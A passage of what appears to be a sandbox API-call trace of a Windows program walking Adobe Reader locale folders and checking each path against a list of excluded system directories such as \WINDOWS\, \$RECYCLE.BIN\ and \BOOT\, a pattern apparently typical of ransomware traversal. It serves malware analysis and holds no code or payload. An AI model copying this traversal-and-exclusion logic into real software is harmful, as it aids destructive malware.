ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82d47040, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x20000, dwReserved0=0x0, dwReserved1=0x0, cFileName="DigSig.PTB", cAlternateFileName="")) returned 1 [0058.557] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82d47040, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="DVA.PTB", cAlternateFileName="")) returned 1 [0058.557] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82e519e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="eBook.PTB", cAlternateFileName="")) returned 1 [0058.557] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82d47040, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xa000, dwReserved0=0x0, dwReserved1=0x0, cFileName="EScript.PTB", cAlternateFileName="")) returned 1 [0058.557] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82d47040, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="IA32.PTB", cAlternateFileName="")) returned 1 [0058.557] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7da69260, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x13200, dwReserved0=0x0, dwReserved1=0x0, cFileName="makeaccessible.PTB", cAlternateFileName="MAKEAC~1.PTB")) returned 1 [0058.558] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d749580, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x13e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Multimedia.PTB", cAlternateFileName="MULTIM~1.PTB")) returned 1 [0058.558] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7da1cfa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="pddom.PTB", cAlternateFileName="")) returned 1 [0058.558] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82d47040, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x82000, dwReserved0=0x0, dwReserved1=0x0, cFileName="PPKLITE.PTB", cAlternateFileName="")) returned 1 [0058.558] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7f876820, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x150600, dwReserved0=0x0, dwReserved1=0x0, cFileName="RdLang32.PTB", cAlternateFileName="")) returned 1 [0058.558] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82ec3e00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadOutLoud.PTB", cAlternateFileName="READOU~1.PTB")) returned 1 [0058.558] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7da43100, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1200, dwReserved0=0x0, dwReserved1=0x0, cFileName="reflow.PTB", cAlternateFileName="")) returned 1 [0058.558] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7dab5520, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="SaveAsRTF.PTB", cAlternateFileName="SAVEAS~1.PTB")) returned 1 [0058.558] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82d47040, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Search.PTB", cAlternateFileName="")) returned 1 [0058.558] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82d47040, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x3e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="SendMail.PTB", cAlternateFileName="")) returned 1 [0058.558] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f4af00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81fbd320, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81fbd320, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 1 [0058.558] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pt_BR\\Services\\*.*", lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f4af00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81fbd320, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81fbd320, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa40 [0058.559] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f4af00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81fbd320, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81fbd320, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.559] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81fbd320, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x8fab, dwReserved0=0x0, dwReserved1=0x0, cFileName="DEXShare.asfx", cAlternateFileName="DEXSHA~1.ASF")) returned 1 [0058.559] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81f4af00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xea, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services.asfx", cAlternateFileName="SERVIC~1.ASF")) returned 1 [0058.559] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81f4af00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xea, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services.asfx", cAlternateFileName="SERVIC~1.ASF")) returned 0 [0058.560] FindClose (in: hFindFile=0x69aa40 | out: hFindFile=0x69aa40) returned 1 [0058.560] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7ddd5200, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Spelling.PTB", cAlternateFileName="")) returned 1 [0058.560] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7f4e4720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="updater.PTB", cAlternateFileName="")) returned 1 [0058.560] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82d47040, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x6e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Weblink.PTB", cAlternateFileName="")) returned 1 [0058.560] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82d47040, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x6e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Weblink.PTB", cAlternateFileName="")) returned 0 [0058.560] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.560] FindNextFileW (in: hFindFile=0x69a9c0, lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d7bb9a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x832c8320, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x832c8320, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ro_RO", cAlternateFileName="")) returned 1 [0058.560] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d7bb9a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x832c8320, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x832c8320, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.562] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d7bb9a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x832c8320, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x832c8320, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.562] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7db73c00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xb200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Accessibility.RUM", cAlternateFileName="ACCESS~1.RUM")) returned 1 [0058.562] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x831716c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x6a800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Acroform.RUM", cAlternateFileName="")) returned 1 [0058.562] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81d0fa60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdobeCollabSync.RUM", cAlternateFileName="ADOBEC~1.RUM")) returned 1 [0058.562] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x832c8320, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x7ca00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Annots.RUM", cAlternateFileName="")) returned 1 [0058.562] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8207ba00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x3800, dwReserved0=0x0, dwReserved1=0x0, cFileName="BRdlang32.RUM", cAlternateFileName="BRDLAN~1.RUM")) returned 1 [0058.562] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x831716c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1fa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Checkers.RUM", cAlternateFileName="")) returned 1 [0058.563] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x83197820, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x20200, dwReserved0=0x0, dwReserved1=0x0, cFileName="DigSig.RUM", cAlternateFileName="")) returned 1 [0058.563] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x83197820, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4800, dwReserved0=0x0, dwReserved1=0x0, cFileName="DVA.RUM", cAlternateFileName="")) returned 1 [0058.563] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8327c060, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="eBook.RUM", cAlternateFileName="")) returned 1 [0058.563] CharUpperBuffW (in: lpsz=".RUM", cchLength=0x4 | out: lpsz=".RUM") returned 0x4 [0058.563] CharUpperBuffW (in: lpsz="Reflow.RUM", cchLength=0xa | out: lpsz="REFLOW.RUM") returned 0xa [0058.563] CharUpperBuffW (in: lpsz=".RUM", cchLength=0x4 | out: lpsz=".RUM") returned 0x4 [0058.563] CharUpperBuffW (in: lpsz="SaveAsRTF.RUM", cchLength=0xd | out: lpsz="SAVEASRTF.RUM") returned 0xd [0058.563] CharUpperBuffW (in: lpsz=".RUM", cchLength=0x4 | out: lpsz=".RUM") returned 0x4 [0058.564] CharUpperBuffW (in: lpsz="Search.RUM", cchLength=0xa | out: lpsz="SEARCH.RUM") returned 0xa [0058.564] CharUpperBuffW (in: lpsz=".RUM", cchLength=0x4 | out: lpsz=".RUM") returned 0x4 [0058.564] CharUpperBuffW (in: lpsz="SendMail.RUM", cchLength=0xc | out: lpsz="SENDMAIL.RUM") returned 0xc [0058.564] CharUpperBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", cchLength=0x26 | out: lpsz="C:\\USERS\\5P5NRGJN0JS HALPMCXZ\\DESKTOP\\") returned 0x26 [0058.564] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.564] CharUpperBuffW (in: lpsz="\\PERFLOGS\\", cchLength=0xa | out: lpsz="\\PERFLOGS\\") returned 0xa [0058.564] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.564] CharUpperBuffW (in: lpsz="\\WINDOWS\\", cchLength=0x9 | out: lpsz="\\WINDOWS\\") returned 0x9 [0058.564] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.564] CharUpperBuffW (in: lpsz="\\WINDOWS.OLD\\", cchLength=0xd | out: lpsz="\\WINDOWS.OLD\\") returned 0xd [0058.564] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.564] CharUpperBuffW (in: lpsz="\\WINDOWS10UPGRADE\\", cchLength=0x12 | out: lpsz="\\WINDOWS10UPGRADE\\") returned 0x12 [0058.564] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.564] CharUpperBuffW (in: lpsz="\\$RECYCLE.BIN\\", cchLength=0xe | out: lpsz="\\$RECYCLE.BIN\\") returned 0xe [0058.564] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.564] CharUpperBuffW (in: lpsz="\\WINDOWS NT\\", cchLength=0xc | out: lpsz="\\WINDOWS NT\\") returned 0xc [0058.564] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.564] CharUpperBuffW (in: lpsz="\\COMMON FILES\\", cchLength=0xe | out: lpsz="\\COMMON FILES\\") returned 0xe [0058.564] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.564] CharUpperBuffW (in: lpsz="\\TEMP\\", cchLength=0x6 | out: lpsz="\\TEMP\\") returned 0x6 [0058.564] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.564] CharUpperBuffW (in: lpsz="\\BOOT\\", cchLength=0x6 | out: lpsz="\\BOOT\\") returned 0x6 [0058.565] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.565] CharUpperBuffW (in: lpsz="\\MSOCACHE\\", cchLength=0xa | out: lpsz="\\MSOCACHE\\") returned 0xa [0058.565] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.565] CharUpperBuffW (in: lpsz="\\DEFAULT USER\\", cchLength=0xe | out: lpsz="\\DEFAULT USER\\") returned 0xe [0058.565] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 